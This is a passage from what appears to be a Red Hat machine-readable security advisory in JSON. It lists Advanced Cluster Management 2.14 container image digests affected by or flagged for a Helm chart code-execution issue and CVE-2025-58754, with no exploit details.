"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "helm.sh/helm/v3: Helm Chart Code Execution"
},
{
"cve": "CVE-2025-58754",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-12T02:00:53.897605+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
